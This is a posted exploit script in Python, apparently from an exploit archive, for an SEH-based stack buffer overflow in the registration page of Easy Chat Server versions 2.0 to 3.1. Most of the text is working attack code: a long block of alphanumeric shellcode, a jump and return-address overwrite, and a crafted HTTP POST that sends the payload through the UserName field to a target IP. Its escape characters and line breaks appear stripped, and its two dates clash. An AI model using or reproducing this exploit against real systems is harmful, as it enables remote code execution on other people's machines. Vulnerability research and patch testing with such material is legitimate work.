Easy Chat Server 3.1 Buffer Overflow
Posted on 13 June 2017
# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH) # Date: 09/10/2017 # Software Link: http://echatserver.com/ecssetup.exe # Exploit Author: Aitezaz Mohsin # Vulnerable Version: v2.0 to v3.1 # Vulnerability Type: Buffer Overflow # Severity: Critical # Tested on: [Windows XP Sp3 Eng] # ====================================================================================================================== # Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability. # Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. # ====================================================================================================================== # USAGE: python exploit.py ip #!/usr/bin/python import os import sys import socket ip = sys.argv[1] socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) socket.connect((ip , 80)) #AlphanumericShellcode shellcode = ("x89xe2xdaxdexd9x72xf4x59x49x49x49x49x49x43x43" "x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41" "x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42" "x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50" "x38x41x43x4ax4ax49x4bx4cx5ax48x4bx32x55x50x33" "x30x35x50x43x50x4dx59x5ax45x36x51x4fx30x32x44" "x4cx4bx30x50x50x30x4cx4bx51x42x54x4cx4cx4bx30" "x52x44x54x4cx4bx44x32x36x48x34x4fx58x37x50x4a" "x31x36x36x51x4bx4fx4ex4cx47x4cx43x51x33x4cx43" "x32x46x4cx51x30x39x51x48x4fx34x4dx45x51x48x47" "x4dx32x4cx32x50x52x56x37x4cx4bx31x42x42x30x4c" "x4bx31x5ax47x4cx4cx4bx30x4cx54x51x42x58x4ax43" "x47x38x35x51x48x51x36x31x4cx4bx46x39x37x50x55" "x51x49x43x4cx4bx50x49x35x48x4bx53x57x4ax37x39" "x4cx4bx50x34x4cx4bx53x31x38x56x56x51x4bx4fx4e" "x4cx49x51x38x4fx44x4dx53x31x39x57x37x48x4bx50" "x32x55x4ax56x43x33x43x4dx4cx38x57x4bx43x4dx31" "x34x43x45x5ax44x46x38x4cx4bx31x48x51x34x33x31" "x58x53x42x46x4cx4bx44x4cx30x4bx4cx4bx46x38x35" "x4cx35x51x4ex33x4cx4bx45x54x4cx4bx43x31x4ex30" "x4dx59x30x44x31x34x37x54x31x4bx51x4bx53x51x31" "x49x50x5ax56x31x4bx4fx4dx30x51x4fx51x4fx50x5a" "x4cx4bx35x42x5ax4bx4cx4dx51x4dx55x38x46x53x36" "x52x35x50x55x50x45x38x32x57x32x53x30x32x51x4f" "x56x34x33x58x30x4cx32x57x56x46x44x47x4bx4fx58" "x55x4fx48x4cx50x35x51x43x30x43x30x37x59x4fx34" "x50x54x50x50x32x48x37x59x4bx30x32x4bx55x50x4b" "x4fx59x45x53x5ax33x38x50x59x50x50x5ax42x4bx4d" "x51x50x36x30x31x50x36x30x45x38x4bx5ax54x4fx39" "x4fx4bx50x4bx4fx38x55x4cx57x52x48x53x32x45x50" "x44x51x31x4cx4bx39x4bx56x52x4ax52x30x50x56x56" "x37x33x58x58x42x39x4bx46x57x55x37x4bx4fx39x45" "x51x47x43x58x4fx47x4bx59x30x38x4bx4fx4bx4fx59" "x45x51x47x42x48x54x34x5ax4cx57x4bx4bx51x4bx4f" "x48x55x30x57x5ax37x42x48x32x55x52x4ex30x4dx45" "x31x4bx4fx38x55x35x38x35x33x52x4dx45x34x45x50" "x4bx39x4dx33x56x37x31x47x56x37x46x51x5ax56x32" "x4ax44x52x56x39x31x46x5ax42x4bx4dx53x56x39x57" "x30x44x51x34x57x4cx35x51x33x31x4cx4dx37x34x57" "x54x32x30x58x46x35x50x51x54x50x54x30x50x31x46" "x51x46x36x36x31x56x36x36x30x4ex36x36x51x46x31" "x43x46x36x43x58x33x49x48x4cx47x4fx4bx36x4bx4f" "x58x55x4cx49x4dx30x30x4ex36x36x47x36x4bx4fx56" "x50x32x48x33x38x4cx47x35x4dx35x30x4bx4fx49x45" "x4fx4bx4ax50x48x35x59x32x50x56x52x48x4fx56x5a" "x35x4fx4dx4dx4dx4bx4fx58x55x37x4cx53x36x33x4c" "x44x4ax4bx30x4bx4bx4dx30x33x45x45x55x4fx4bx37" "x37x34x53x52x52x32x4fx53x5ax35x50x36x33x4bx4f" "x4ex35x41x41") magic = "B" * 217 magic += "xebx06x90x90" magic += "xBCx04x01x10" magic += shellcode magic += "C" * 200 buffer = "POST /registresult.htm HTTP/1.1 " buffer += "Host: 192.168.1.11" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" buffer += "Accept-Language: en-US,en;q=0.5" buffer += "Accept-Encoding: gzip, deflate" buffer += "Referer: http://192.168.1.11/register.ghp" buffer += "Connection: close" buffer += "Content-Type: application/x-www-form-urlencoded" buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" socket.send(buffer) data = socket.recv(4096) print data socket.close()
